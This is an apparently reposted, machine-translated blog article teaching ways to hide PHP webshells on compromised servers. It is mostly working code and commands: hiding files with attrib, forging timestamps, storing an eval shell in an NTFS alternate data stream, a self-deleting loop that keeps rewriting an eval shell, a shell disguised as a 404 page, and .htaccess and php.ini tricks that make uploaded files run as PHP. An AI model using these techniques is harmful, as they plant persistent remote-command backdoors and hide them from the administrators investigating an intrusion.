当前位置:网站首页>PHP backdoor hiding skills
PHP backdoor hiding skills
2020-11-06 22:33:35 【Official account Bypass】
If you want your own Webshell Stay longer , except Webshell Don't kill , There are also some hidden techniques to be aware of , Like hiding files , Modify time properties , Hide file contents, etc .
1、 Hidden files
Use Attrib +s +a +h +r The command is to add system file properties to the original folder 、 Archive properties 、 Read only file properties and hidden file properties .
attrib +s +a +h +r shell.php // hide shell.php file
2、 Modify the file time attribute
When you try to hide your newly created files in a bunch of files , that , In addition to creating a confusing file name , You also need to change the revision date of the file .
// Modification time modification
Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"
// The visit time was modified
Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"
// Creation time modification
Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"
Use the command to get the file properties
Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force
Modify the creation and modification time of all files in a folder
powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"
3、 utilize ADS Hide file content
On the server echo A data stream file goes in , such as index.php It's a normal web page file , We can do it like this :
echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
This creates an invisible shell hidden.jpg, Regular file manager 、type command ,dir command 、del The order couldn't find that hidden.jpg Of .
utilize include function , take index.php:hidden.jpg Conduct hex code , Put this ADS file include go in , In this way, we can analyze our sentence normally .
<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>
4、 The undead horse
The undead horse will delete itself , Loop to create hidden backdoors in the form of processes .
<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__); // Delete yourself
while(1)
{
file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); // establish shell.php, It's better to use the sentence of no killing here
sleep(10); // Time interval between
}
?>
The simplest and most effective way to deal with it , Restart the service and delete it webshell file .
5、 Middleware back door
Will be compiled so File copy to modules Folder , Start the back door module , restart Apache. When sending a string past for a specific parameter , Can trigger the back door .
github Project address :
https://github.com/VladRico/apache2_BackdoorMod
6、 utilize 404 Page hidden back door
404 The page is mainly used to enhance the user experience , Can be used to hide backdoor files .
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>
7、 utilize .htaccess Document composition PHP back door
commonly .htaccess It can be used to leave backdoors and bypass blacklists , Create... In the upload directory .htaccess File is written to , It doesn't need to be restarted to take effect , Upload png File parsing .
AddType application/x-httpd-php .png
in addition , stay .htaccess Join in php Parsing rules , Include the file name with 1 Analysis into php, Upload 1.txt It can be parsed .
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>
8、 utilize php.ini Hide backdoor files
php.ini You can specify the name of the file that will be automatically resolved before and after the execution of the main file , Commonly used in the common header and tail of a page , It can also be used to hide php back door .
; stay PHP Automatically add files before documents .
auto_prepend_file = "c:\tmp.txt"
; stay PHP Automatically add files after the document .
auto_prepend_file = "c:\tmp.txt"
Need to restart the service to take effect , Visit any one of php File is available webshell.
This article is from WeChat official account. - Bypass(Bypass--).
If there is any infringement , Please contact the [email protected] Delete .
Participation of this paper “OSC Source creation plan ”, You are welcome to join us , share .
版权声明
本文为[Official account Bypass]所创,转载请带上原文链接,感谢
边栏推荐
- C++ 数字、string和char*的转换
- C++学习——centos7上部署C++开发环境
- C++学习——一步步学会写Makefile
- C++学习——临时对象的产生与优化
- C++学习——对象的引用的用法
- C++编程经验(6):使用C++风格的类型转换
- Won the CKA + CKS certificate with the highest gold content in kubernetes in 31 days!
- C + + number, string and char * conversion
- C + + Learning -- capacity() and resize() in C + +
- C + + Learning -- about code performance optimization
猜你喜欢
-
C + + programming experience (6): using C + + style type conversion
-
Latest party and government work report ppt - Park ppt
-
在线身份证号码提取生日工具
-
Online ID number extraction birthday tool
-
️野指针?悬空指针?️ 一文带你搞懂!
-
Field pointer? Dangling pointer? This article will help you understand!
-
HCNA Routing&Switching之GVRP
-
GVRP of hcna Routing & Switching
-
Seq2Seq实现闲聊机器人
-
【闲聊机器人】seq2seq模型的原理
随机推荐
- LeetCode 91. 解码方法
- Seq2seq implements chat robot
- [chat robot] principle of seq2seq model
- Leetcode 91. Decoding method
- HCNA Routing&Switching之GVRP
- GVRP of hcna Routing & Switching
- HDU7016 Random Walk 2
- [Code+#1]Yazid 的新生舞会
- CF1548C The Three Little Pigs
- HDU7033 Typing Contest
- HDU7016 Random Walk 2
- [code + 1] Yazid's freshman ball
- CF1548C The Three Little Pigs
- HDU7033 Typing Contest
- Qt Creator 自动补齐变慢的解决
- HALCON 20.11:如何处理标定助手品质问题
- HALCON 20.11:标定助手使用注意事项
- Solution of QT creator's automatic replenishment slowing down
- Halcon 20.11: how to deal with the quality problem of calibration assistant
- Halcon 20.11: precautions for use of calibration assistant
- “十大科学技术问题”揭晓!|青年科学家50²论坛
- "Top ten scientific and technological issues" announced| Young scientists 50 ² forum
- 求反转链表
- Reverse linked list
- js的数据类型
- JS data type
- 记一次文件读写遇到的bug
- Remember the bug encountered in reading and writing a file
- 单例模式
- Singleton mode
- 在这个 N 多编程语言争霸的世界,C++ 究竟还有没有未来?
- In this world of N programming languages, is there a future for C + +?
- es6模板字符
- js Promise
- js 数组方法 回顾
- ES6 template characters
- js Promise
- JS array method review
- 【Golang】️走进 Go 语言️ 第一课 Hello World
- [golang] go into go language lesson 1 Hello World